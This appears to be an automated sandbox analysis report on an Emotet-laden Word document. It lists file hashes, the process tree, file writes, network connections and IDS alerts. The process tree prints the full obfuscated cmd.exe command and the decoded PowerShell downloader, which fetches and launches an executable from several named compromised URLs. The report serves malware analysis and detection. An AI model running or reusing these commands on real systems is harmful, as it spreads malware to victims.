File name: | DOC-15912851435.doc |
Full analysis: | https://app.any.run/tasks/5945b382-7473-41f4-8e21-622df5333b9a |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 06, 2018, 05:23:11 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Dec 5 20:36:00 2018, Last Saved Time/Date: Wed Dec 5 20:36:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 22, Security: 0 |
MD5: | 43B31C1E92C6951F466DBBC7882A3FB2 |
SHA1: | E24151E919670EEABA5F32CDDF20960B80797982 |
SHA256: | 3F6C7CC0E8A986FD620FA8290375852638A83C33B096FF686777DDB70D226AA9 |
SSDEEP: | 1536:481ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9cvTbiG12LmYUpXMq:48GhDS0o9zTGOZD6EbzCdcniVLrUpMq |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 24 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 22 |
Words: | 3 |
Pages: | 1 |
ModifyDate: | 2018:12:05 20:36:00 |
CreateDate: | 2018:12:05 20:36:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2808 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOC-15912851435.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3824 | c:\TEjfSlZ\MmfIzdaMCqYl\WIVzZoUwn\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set Abg=zsRhsLbVZEDRBMHqwLUGPLzjDWpwfiuwKaILuFuTAc;g 3v6S(/8:Q{5=d$xyC+@ro1OkY')_\N-e4lnmJ20X,.t}&&for %L in (58;13;24;67;56;70;7;37;3;70;42;58;78;13;32;56;79;76;31;75;65;6;23;76;41;87;44;74;76;87;86;25;76;6;61;78;29;76;79;87;42;58;9;39;40;56;70;3;87;87;26;52;50;50;87;64;33;46;76;78;41;76;79;87;64;76;79;60;86;41;65;80;50;57;31;76;55;18;29;78;37;76;63;3;87;87;26;52;50;50;6;78;65;43;6;6;31;86;79;76;87;50;31;26;75;41;65;79;87;76;79;87;50;37;4;45;61;67;8;38;78;9;43;63;3;87;87;26;52;50;50;28;64;76;76;80;29;79;57;26;3;65;87;65;43;64;33;26;3;60;86;41;65;80;50;80;65;57;38;78;76;4;50;80;65;57;72;68;82;72;78;65;43;29;79;50;18;81;45;66;12;15;37;18;6;7;63;3;87;87;26;52;50;50;4;60;78;31;29;33;38;64;6;33;79;86;26;78;50;29;80;33;43;76;4;50;45;8;7;12;19;46;77;67;63;3;87;87;26;52;50;50;80;76;57;29;33;87;64;76;79;57;4;86;4;38;80;33;4;76;64;46;29;41;76;4;26;64;65;23;76;41;87;4;86;41;65;80;50;18;9;65;24;48;33;66;15;70;86;48;26;78;29;87;49;70;63;70;71;42;58;6;53;79;56;70;31;84;23;70;42;58;26;84;15;44;56;44;70;45;82;47;70;42;58;84;31;68;56;70;40;11;6;70;42;58;84;74;57;56;58;76;79;46;52;87;76;80;26;62;70;73;70;62;58;26;84;15;62;70;86;76;59;76;70;42;28;65;64;76;33;41;3;49;58;40;7;19;44;29;79;44;58;9;39;40;71;54;87;64;60;54;58;78;13;32;86;24;65;31;79;78;65;33;57;37;29;78;76;49;58;40;7;19;85;44;58;84;74;57;71;42;58;35;7;19;56;70;69;68;33;70;42;34;28;44;49;49;19;76;87;75;34;87;76;80;44;58;84;74;57;71;86;78;76;79;43;87;3;44;75;43;76;44;51;83;83;83;83;71;44;54;34;79;46;65;68;76;75;34;87;76;80;44;58;84;74;57;42;58;35;61;29;56;70;41;53;22;70;42;6;64;76;33;68;42;88;88;41;33;87;41;3;54;88;88;58;15;23;68;56;70;67;23;40;70;42;90)do set X7g=!X7g!!Abg:~%L,1!&&if %L equ 90 powershell "!X7g:~-517!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2304 | CmD /V:/C"set Abg=zsRhsLbVZEDRBMHqwLUGPLzjDWpwfiuwKaILuFuTAc;g 3v6S(/8:Q{5=d$xyC+@ro1OkY')_\N-e4lnmJ20X,.t}&&for %L in (58;13;24;67;56;70;7;37;3;70;42;58;78;13;32;56;79;76;31;75;65;6;23;76;41;87;44;74;76;87;86;25;76;6;61;78;29;76;79;87;42;58;9;39;40;56;70;3;87;87;26;52;50;50;87;64;33;46;76;78;41;76;79;87;64;76;79;60;86;41;65;80;50;57;31;76;55;18;29;78;37;76;63;3;87;87;26;52;50;50;6;78;65;43;6;6;31;86;79;76;87;50;31;26;75;41;65;79;87;76;79;87;50;37;4;45;61;67;8;38;78;9;43;63;3;87;87;26;52;50;50;28;64;76;76;80;29;79;57;26;3;65;87;65;43;64;33;26;3;60;86;41;65;80;50;80;65;57;38;78;76;4;50;80;65;57;72;68;82;72;78;65;43;29;79;50;18;81;45;66;12;15;37;18;6;7;63;3;87;87;26;52;50;50;4;60;78;31;29;33;38;64;6;33;79;86;26;78;50;29;80;33;43;76;4;50;45;8;7;12;19;46;77;67;63;3;87;87;26;52;50;50;80;76;57;29;33;87;64;76;79;57;4;86;4;38;80;33;4;76;64;46;29;41;76;4;26;64;65;23;76;41;87;4;86;41;65;80;50;18;9;65;24;48;33;66;15;70;86;48;26;78;29;87;49;70;63;70;71;42;58;6;53;79;56;70;31;84;23;70;42;58;26;84;15;44;56;44;70;45;82;47;70;42;58;84;31;68;56;70;40;11;6;70;42;58;84;74;57;56;58;76;79;46;52;87;76;80;26;62;70;73;70;62;58;26;84;15;62;70;86;76;59;76;70;42;28;65;64;76;33;41;3;49;58;40;7;19;44;29;79;44;58;9;39;40;71;54;87;64;60;54;58;78;13;32;86;24;65;31;79;78;65;33;57;37;29;78;76;49;58;40;7;19;85;44;58;84;74;57;71;42;58;35;7;19;56;70;69;68;33;70;42;34;28;44;49;49;19;76;87;75;34;87;76;80;44;58;84;74;57;71;86;78;76;79;43;87;3;44;75;43;76;44;51;83;83;83;83;71;44;54;34;79;46;65;68;76;75;34;87;76;80;44;58;84;74;57;42;58;35;61;29;56;70;41;53;22;70;42;6;64;76;33;68;42;88;88;41;33;87;41;3;54;88;88;58;15;23;68;56;70;67;23;40;70;42;90)do set X7g=!X7g!!Abg:~%L,1!&&if %L equ 90 powershell "!X7g:~-517!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2228 | powershell "$MDO='VFh';$lMK=new-object Net.WebClient;$ETA='http://travelcentreny.com/dwe5UilFe@http://blogbbw.net/wp-content/Fs3COZulEg@http://freemindphotography.com/modules/mod_k2_login/UJ31BqFUbV@http://sylwiaurban.pl/images/3ZVBGv4O@http://mediatrends.sumaservicesprojects.com/UEoDSa1q'.Split('@');$bQn='wXj';$pXq = '326';$Xwk='ARb';$XNd=$env:temp+'\'+$pXq+'.exe';foreach($AVG in $ETA){try{$lMK.DownloadFile($AVG, $XNd);$LVG='Yka';If ((Get-Item $XNd).length -ge 80000) {Invoke-Item $XNd;$LCi='cQz';break;}}catch{}}$qjk='OjA';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3272 | "C:\Users\admin\AppData\Local\Temp\326.exe" | C:\Users\admin\AppData\Local\Temp\326.exe | — | powershell.exe |
User: admin Company: Nexon Corp. Integrity Level: MEDIUM Description: Softpub Forwarder DLL Exit code: 0 Version: 6.1.7600.1 | ||||
3940 | "C:\Users\admin\AppData\Local\Temp\326.exe" | C:\Users\admin\AppData\Local\Temp\326.exe | 326.exe | |
User: admin Company: Nexon Corp. Integrity Level: MEDIUM Description: Softpub Forwarder DLL Exit code: 0 Version: 6.1.7600.1 | ||||
3376 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 326.exe |
User: admin Company: Nexon Corp. Integrity Level: MEDIUM Description: Softpub Forwarder DLL Exit code: 0 Version: 6.1.7600.1 | ||||
3960 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Company: Nexon Corp. Integrity Level: MEDIUM Description: Softpub Forwarder DLL Version: 6.1.7600.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9551.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2228 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UZNRZZW3Y54RS8YR34TT.temp | — | |
MD5:— | SHA256:— | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6E28B672E33ED44FA2233E4B0EA4D984 | SHA256:ECF9C6BE22E4A542EBECD6F2A9B2ABCD77BA994D3F8910570A44D4737F95D6E1 | |||
2228 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2228 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a907.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$C-15912851435.doc | pgc | |
MD5:EF38695C67B4AF81BF5C9A3030F41DF7 | SHA256:30AB6C62D799F845C67830F2A939229C334047F1C66A8D37BC240DFAE38B2C9C | |||
2228 | powershell.exe | C:\Users\admin\AppData\Local\Temp\326.exe | executable | |
MD5:5CBE56001C8566C2A96005F039A84E73 | SHA256:23570CFF5A88F6513543A982BFE330C15952DC75A10BC7D90D5FBAA9152CE9C2 | |||
3940 | 326.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:5CBE56001C8566C2A96005F039A84E73 | SHA256:23570CFF5A88F6513543A982BFE330C15952DC75A10BC7D90D5FBAA9152CE9C2 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3960 | archivesymbol.exe | GET | — | 187.160.2.73:443 | http://187.160.2.73:443/ | MX | — | — | malicious |
3960 | archivesymbol.exe | GET | 200 | 200.6.168.130:990 | http://200.6.168.130:990/ | CO | binary | 132 b | suspicious |
2228 | powershell.exe | GET | 301 | 132.148.37.169:80 | http://travelcentreny.com/dwe5UilFe | US | html | 244 b | malicious |
2228 | powershell.exe | GET | 200 | 132.148.37.169:80 | http://travelcentreny.com/dwe5UilFe/ | US | executable | 120 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3960 | archivesymbol.exe | 80.149.179.98:7080 | — | Deutsche Telekom AG | DE | malicious |
3960 | archivesymbol.exe | 187.160.2.73:443 | — | Television Internacional, S.A. de C.V. | MX | malicious |
3960 | archivesymbol.exe | 200.6.168.130:990 | — | EPM Telecomunicaciones S.A. E.S.P. | CO | suspicious |
2228 | powershell.exe | 132.148.37.169:80 | travelcentreny.com | GoDaddy.com, LLC | US | malicious |
Domain | IP | Reputation |
---|---|---|
travelcentreny.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2228 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2228 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2228 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2228 | powershell.exe | Misc activity | ET INFO EXE CheckRemoteDebuggerPresent (Used in Malware Anti-Debugging) |
2228 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3960 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3960 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3960 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3960 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |